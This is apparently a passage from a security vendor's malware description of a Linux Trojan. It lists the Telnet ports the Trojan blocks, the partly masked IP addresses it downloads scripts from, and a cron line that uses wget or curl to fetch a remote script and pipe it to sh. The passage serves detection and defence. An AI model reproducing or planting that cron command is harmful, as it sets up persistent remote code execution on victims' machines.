Other Details

This Trojan does the following:

  • It blocks outgoing Telnet connections on the following ports:
    • 23
    • 2323
  • It creates the following cronjob to download and execute 2.sh every 1 hour:
    • * 1 * * * $LDR http://{BLOCKED}.{BLOCKED}.39.78/2.sh | sh > /dev/null 2>&1
    where $LDR can be any of the following:
    • wget -q -O -
    • curl
  • It connects to the following URL to download a file:
    • http://{BLOCKED}.{BLOCKED}.39.78/4.sh
    • http://{BLOCKED}.{BLOCKED}.39.78/re.php
    • http://{BLOCKED}.{BLOCKED}.39.78/dog2.6
      It saves the file using the following name:where $DIR can be any of the following:
      • /tmp/{random temp name}/tmp
      • /var/tmp
